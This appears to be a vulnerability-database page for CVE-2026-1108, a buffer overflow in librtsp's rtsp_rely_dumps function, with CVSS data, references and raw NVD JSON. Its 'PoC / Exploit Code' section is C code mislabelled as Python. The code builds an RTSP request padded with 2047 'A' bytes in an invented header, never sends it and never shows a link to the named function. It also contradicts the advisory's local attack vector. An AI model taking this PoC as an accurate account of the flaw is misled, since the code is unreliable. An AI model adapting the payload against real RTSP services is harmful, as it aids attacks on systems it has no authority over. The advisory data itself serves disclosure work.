CVE-2026-1108

Description

A security vulnerability has been detected in cijliu librtsp up to 2ec1a81ad65280568a0c7c16420d7c10fde13b04. The affected element is the function rtsp_rely_dumps. The manipulation leads to buffer overflow. An attack has to be approached locally. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:cijliu:librtsp:*:*:*:*:*:*:*:* - VULNERABLE

cijliu librtsp <= 2ec1a81ad65280568a0c7c16420d7c10fde13b04

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-1108 PoC - librtsp rtsp_rely_dumps Buffer Overflow
// Target: cijliu librtsp up to 2ec1a81ad65280568a0c7c16420d7c10fde13b04

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// Malicious RTSP packet that triggers buffer overflow in rtsp_rely_dumps
void create_malicious_rtsp_packet(char *buffer, size_t buf_size) {
    // Craft RTSP DESCRIBE request with oversized field
    const char *malicious_payload = 
        "DESCRIBE rtsp://target/stream RTSP/1.0\r\n"
        "CSeq: 1\r\n"
        "User-Agent: PoC-Client\r\n"
        "X-Rely-Data: ";
    
    // Fill with overflow data (exceeds buffer limit)
    char overflow_data[2048];
    memset(overflow_data, 'A', sizeof(overflow_data) - 1);
    overflow_data[sizeof(overflow_data) - 1] = '\0';
    
    snprintf(buffer, buf_size, "%s%s\r\n\r\n", malicious_payload, overflow_data);
}

int main() {
    printf("CVE-2026-1108 PoC - librtsp rtsp_rely_dumps Buffer Overflow\n");
    printf("This PoC demonstrates the buffer overflow in rtsp_rely_dumps function\n");
    printf("Target: cijliu librtsp <= 2ec1a81ad65280568a0c7c16420d7c10fde13b04\n\n");
    
    char packet[4096];
    create_malicious_rtsp_packet(packet, sizeof(packet));
    
    printf("Generated malicious RTSP packet:\n");
    printf("Length: %zu bytes\n", strlen(packet));
    printf("Packet contains %zu bytes of overflow data\n", strlen(packet) - 200);
    
    // In real exploitation, this packet would be sent to target
    // The vulnerable rtsp_rely_dumps function would process it
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1108
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1108
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1108/
[4] VulDB https://vuldb.com/cve/CVE-2026-1108
[5] https://github.com/fizz-is-on-the-way/vuls_protocol/blob/main/librtsp_rtsp_rely_dumps/librtsp_rtsp_rely_dumps.md
[6] https://vuldb.com/?ctiid.341700
[7] https://vuldb.com/?id.341700
[8] https://vuldb.com/?submit.732598

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1108", "sourceIdentifier": "[email protected]", "published": "2026-01-18T02:16:25.990", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in cijliu librtsp up to 2ec1a81ad65280568a0c7c16420d7c10fde13b04. The affected element is the function rtsp_rely_dumps. The manipulation leads to buffer overflow. An attack has to be approached locally. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha detectado una vulnerabilidad de seguridad en cijliu librtsp hasta 2ec1a81ad65280568a0c7c16420d7c10fde13b04. El elemento afectado es la función rtsp_rely_dumps. La manipulación conduce a desbordamiento de búfer. Un ataque debe abordarse localmente. Este producto utiliza una versión continua para proporcionar entrega continua. Por lo tanto, no se dispone de detalles de versión para versiones afectadas ni actualizadas. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cijliu:librtsp:*:*:*:*:*:*:*:*", "versionEndIncluding": "2021-03-14", "matchCriteriaId": "434C52CB-48A2-409B-8685-B0907D0936EF"}]}]}], "references": [{"url": "https://github.com/fizz-is-on-the-way/vuls_protocol/blob/main/librtsp_rtsp_rely_dumps/librtsp_rtsp_rely_dumps.md", "source": "[email protected]", "tags": [ ... (truncated)